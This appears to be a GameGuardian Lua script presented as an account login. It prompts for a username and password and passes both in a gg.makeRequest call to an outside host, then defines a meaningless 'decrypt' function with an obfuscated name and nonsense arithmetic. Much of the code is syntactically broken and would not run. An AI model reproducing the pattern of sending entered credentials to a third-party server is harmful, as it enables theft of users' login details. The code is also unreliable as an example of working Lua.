-- Generated By DDxCN !!
local function s1()
  os.exit()
end


-- MainAcc
acc = {}
 function acc:init(...)
local Y = gg.prompt({
      "Username :",
      "Password :",
    if nil == true then s1()
        if nil == false then gg.toast("success") 
          "text",
          "text"
        }, nil, )
      gg.makeRequest("https://d-code-inc.w3spaces.com/mainServer.js", .. Y [1] .. , .. Username = Y [1] .. ,"https://d-code-inc.w3spaces.com/mainServer.js", .. Y [2] .. , .. Password = Y [2] .. "gg.getFile()")

      local function s2() 
      local Cs = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
        function ReHyevUEfdjUEfjYFydJU
          -- decrypt the encode
          return(function(...)local G = {"local a = ","str","data","(",")","gsub","\46\46\45\45",".","char","len","table.unpack"}, (456735(-35357)) else (6435365 -35335 =35 5356 -3 5356 6546 ( +  34535T (45354- 5473 24T 47246-24 2348762))) end, table.unpack{...}(...)
            --
            gg.toast(ReHyevUEfdjUEfjYFydJU(4836257845784353464847698478498763468746487648687468746885848687457856748687468)) end
          return acc
